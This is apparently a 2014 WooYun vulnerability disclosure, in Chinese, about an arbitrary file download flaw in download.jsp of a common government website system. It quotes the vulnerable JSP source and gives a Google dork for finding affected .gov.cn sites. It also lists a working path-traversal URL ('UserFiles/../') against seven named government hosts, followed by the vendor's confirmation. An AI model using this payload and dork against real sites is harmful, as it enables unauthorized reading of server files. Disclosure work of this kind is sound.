某通用型政府系统任意文件下载

漏洞详情

披露状态:

2014-02-19: 细节已通知厂商并且等待厂商处理中
2014-02-24: 厂商已经确认,细节仅向厂商公开
2014-02-27: 细节向第三方安全合作伙伴开放
2014-03-06: 细节向核心白帽子及相关领域专家公开
2014-03-16: 细节向普通白帽子公开
2014-04-05: 细节向实习白帽子公开
2014-05-20: 细节向公众公开

简要描述:

任意文件下载0.0

详细说明:

1.漏洞出现在download.jsp中

源码分析一下:

<%@page language="java" contentType="application/x-msdownload" import="java.io.*,java.net.*" pageEncoding="gb2312"%><% 
String temp=request.getParameter("path");
if(temp.indexOf("UserFiles")==-1){ //此处仅判断url中是否存在UserFiles关键字
out.println("非法下载路径!");
return;
}
String path=temp;//new String(temp.getBytes("8859_1"),"gb2312"); //temp路径未做处理直接赋值给path,并用于下面的文件读取
response.reset();
response.setContentType("application/x-download");
String filenamedownload = path;
String filenamedisplay = path.substring(path.lastIndexOf("/")+1,path.length());
filenamedisplay = URLEncoder.encode(filenamedisplay,"UTF-8");
response.addHeader("Content-Disposition","attachment;filename=" + filenamedisplay);
OutputStream output = null;
FileInputStream fis = null;
try
{
output = response.getOutputStream();
filenamedownload=request.getSession().getServletContext().getRealPath("/")+filenamedownload;
System.out.println("filenamedownload:"+filenamedownload);
File file=new File(filenamedownload);
if (!file.exists()){
out.println("对不起,文件已删除");
return;
}
fis = new FileInputStream(filenamedownload);//所以问题就出现了

byte[] b = new byte[1024];
int i = 0;
while((i = fis.read(b)) > 0)
{ output.write(b, 0, i);
}
output.flush();
}
………………
%>



有的版本是这个样子:

if(st != null && st.length > 0){
if(!"UserFiles".equals(st[0])){
out.println("文件不存在");
return;
}
}
if(temp==null)
temp="";
String path=new String(temp.getBytes("8859_1"),"gb2312");
response.reset();
String filenamedownload = path;
String filenamedisplay = path.substring(path.lastIndexOf("/")+1,path.length());//"系统解决方案.doc";//系统解决方案.txt
filenamedisplay = URLEncoder.encode(filenamedisplay,"UTF-8");
response.addHeader("Content-Disposition","attachment;filename=" + filenamedisplay);
OutputStream output = null;
FileInputStream fis = null;



其实基本一样了...



2.google dork:

来看看是否通用

site:gov.cn inurl:download.jsp?path=/UserFiles/



获得约 2,590 条结果

downloadtest.jpg





3.以其中一个站点测试:

jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp



downloadtest2.jpg



downloadtest3.jpg





4.提供站点方便验证以及体现其通用性:

jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
crj.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
qz.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
fz.fjhi.gov.cn/site/fuzhou/bin//download.jsp?path=UserFiles/../download.jsp
xxgk.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp

漏洞证明:

downloadtest.jpg



downloadtest2.jpg



downloadtest3.jpg



jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
crj.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
qz.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
fz.fjhi.gov.cn/site/fuzhou/bin//download.jsp?path=UserFiles/../download.jsp
xxgk.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp

修复方案:

麻烦通知修复吧

版权声明:转载请注明来源 magerx@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-02-24 09:18

厂商回复:

对于所述下载功能页面引起的文件包含,是较为常见的,根据后续实例抽测,暂不能认定2590条结果是否为同一CMS或同一开发方(部分功能代码同源情况也比较多)。已经将涉及的福建省网站案例,转由CNCERT下发给福建分中心处置(此前已经有白帽子报送过两至三例)。

最新状态:

暂无


漏洞评价: